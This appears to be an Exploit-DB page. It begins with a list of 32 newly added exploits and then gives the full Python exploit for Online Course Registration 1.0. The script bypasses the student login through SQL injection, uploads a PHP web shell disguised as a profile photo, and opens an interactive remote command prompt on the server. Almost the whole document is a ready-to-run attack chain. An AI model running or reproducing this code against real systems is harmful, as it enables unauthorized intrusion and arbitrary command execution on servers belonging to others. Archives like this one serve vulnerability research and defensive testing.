
32 changes to exploits/shellcodes Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite) Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH) Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter) DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter) Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter) Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter) docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated) ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated) Bludit 3.9.2 - Directory Traversal LibreHealth 2.0.0 - Authenticated Remote Code Execution Online Course Registration 1.0 - Unauthenticated Remote Code Execution elaniin CMS - Authentication Bypass Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting Bio Star 2.8.2 - Local File Inclusion Webtareas 2.1p - Arbitrary File Upload (Authenticated) F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication) Socket.io-file 2.0.31 - Arbitrary File Upload pfSense 2.4.4-p3 - Cross-Site Request Forgery Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting Rails 5.0.1 - Remote Code Execution Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes) Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) Windows/x86 - Download using mshta.exe Shellcode (100 bytes)
113 lines
No EOL
5.4 KiB
Python
Executable file
113 lines
No EOL
5.4 KiB
Python
Executable file
# Exploit Title: Online Course Registration 1.0 - Unauthenticated Remote Code Execution
|
|
# Exploit Author: Bobby Cooke
|
|
# Credit to BKpatron for similar Auth Bypass on admin page - exploit-db.com/exploits/48559
|
|
# Date: 2020-07-15
|
|
# Vendor Homepage: Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
|
|
# Version: 1.0
|
|
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 | Python 2.7.18
|
|
|
|
import requests, sys, urllib, re
|
|
from colorama import Fore, Back, Style
|
|
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
|
|
ok = Fore.GREEN+'['+Fore.RESET+'+'+Fore.GREEN+']'+Fore.RESET+' '
|
|
err = Fore.RED+'['+Fore.RESET+'!'+Fore.RED+']'+Fore.RESET+' '
|
|
info = Fore.BLUE+'['+Fore.RESET+'-'+Fore.BLUE+']'+Fore.RESET+' '
|
|
RS = Style.RESET_ALL
|
|
FR = Fore.RESET
|
|
YL = Fore.YELLOW
|
|
RD = Fore.RED
|
|
|
|
def webshell(SERVER_URL, session):
|
|
try:
|
|
WEB_SHELL = SERVER_URL+'studentphoto/kaio-ken.php'
|
|
getdir = {'telepathy': 'echo %CD%'}
|
|
r2 = session.post(url=WEB_SHELL, data=getdir, verify=False)
|
|
status = r2.status_code
|
|
if status != 200:
|
|
print(err+"Could not connect to the webshell.")
|
|
r2.raise_for_status()
|
|
print(ok+'Successfully connected to webshell.')
|
|
cwd = re.findall('[CDEF].*', r2.text)
|
|
cwd = cwd[0]+"> "
|
|
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
|
|
print(RD+')'+YL+'+++++'+RD+'['+FR+'=========>'+' WELCOME BOKU '+'<========'+RD+']'+YL+'+++++'+RD+'('+FR)
|
|
while True:
|
|
thought = raw_input(term)
|
|
command = {'telepathy': thought}
|
|
r2 = requests.get(WEB_SHELL, params=command, verify=False)
|
|
status = r2.status_code
|
|
if status != 200:
|
|
r2.raise_for_status()
|
|
response2 = r2.text
|
|
print(response2)
|
|
except:
|
|
print('\r\n'+err+'Webshell session failed. Quitting.')
|
|
quit()
|
|
|
|
def formatHelp(STRING):
|
|
return Style.BRIGHT+Fore.RED+STRING+Fore.RESET
|
|
|
|
def header():
|
|
SIG = RD+' /\\\n'+RS
|
|
SIG += YL+'/vvvvvvvvvvvv '+RD+'\\'+FR+'--------------------------------------,\n'
|
|
SIG += YL+'`^^^^^^^^^^^^'+RD+' /'+FR+'============'+RD+'BOKU'+FR+'====================="\n'
|
|
SIG += RD+' \/'+RS+'\n'
|
|
return SIG
|
|
|
|
if __name__ == "__main__":
|
|
print(header())
|
|
if len(sys.argv) != 2:
|
|
print(formatHelp("(+) Usage:\t python %s <WEBAPP_URL>" % sys.argv[0]))
|
|
print(formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/Online Course Registration/'" % sys.argv[0]))
|
|
quit()
|
|
SERVER_URL = sys.argv[1]
|
|
if not re.match(r".*/$", SERVER_URL):
|
|
SERVER_URL = SERVER_URL+'/'
|
|
LOGIN_URL = SERVER_URL+'index.php'
|
|
PROFILE_URL = SERVER_URL+'my-profile.php'
|
|
print(info+'Creating session and saving PHPSESSID')
|
|
s = requests.Session()
|
|
get_session = s.get(SERVER_URL, verify=False)
|
|
if get_session.status_code == 200:
|
|
print(ok+'Successfully connected to server and created session.')
|
|
print(info+get_session.headers['Set-Cookie'])
|
|
else:
|
|
print(err+'Cannot connect to the server and create a web session.')
|
|
bypass_data = {'regno' : '\' or 1=1; -- boku', 'password' : '\' or 1=1; -- boku', 'submit' : ''}
|
|
print(info+'Bypassing authentication of student login portal.')
|
|
auth_bypass = s.post(url=LOGIN_URL, data=bypass_data, verify=False)
|
|
if auth_bypass.history:
|
|
for resp in auth_bypass.history:
|
|
print(info+'Response Status-Code: ' + str(resp.status_code))
|
|
print(info+'Location: ' + str(resp.headers['location']))
|
|
redirectURL = resp.headers['location']
|
|
if re.match(r".*change-password.php", redirectURL):
|
|
print(ok+'Successfully bypassed user portal authentication.')
|
|
else:
|
|
print(err+'Failed to bypass user portal authentication. Quitting.')
|
|
quit()
|
|
get_profile = s.get(url=PROFILE_URL, verify=False)
|
|
Name = str(re.findall(r'name="studentname" value=".*"', get_profile.text))
|
|
Name = re.sub('^.*name="studentname" value="', '', Name)
|
|
Name = re.sub('".*$', '', Name)
|
|
PinCode = str(re.findall(r'name="Pincode" readonly value=".*"', get_profile.text))
|
|
PinCode = re.sub('^.*name="Pincode" readonly value="', '', PinCode)
|
|
PinCode = re.sub('".*$', '', PinCode)
|
|
RegNo = str(re.findall(r'name="studentregno" value=".*"', get_profile.text))
|
|
RegNo = re.sub('^.*name="studentregno" value="', '', RegNo)
|
|
RegNo = re.sub('".*$', '', RegNo)
|
|
print(ok+'{studentname:'+Name+', Pincode:'+PinCode+', studentregno:'+RegNo+'}')
|
|
avatar_img = {
|
|
'photo':
|
|
(
|
|
'kaio-ken.php',
|
|
'<?php echo shell_exec($_REQUEST["telepathy"]); ?>',
|
|
'image/png',
|
|
{'Content-Disposition': 'form-data'}
|
|
)
|
|
}
|
|
upld_data = {'studentname':Name, 'studentregno':RegNo,'Pincode':PinCode,'cgpa':'0.00','submit':''}
|
|
webshell_upload = s.post(url=PROFILE_URL, files=avatar_img, data=upld_data, verify=False)
|
|
print(ok+'Uploaded webshell. Now connecting via POST requests using telepathy.')
|
|
webshell(SERVER_URL, s) |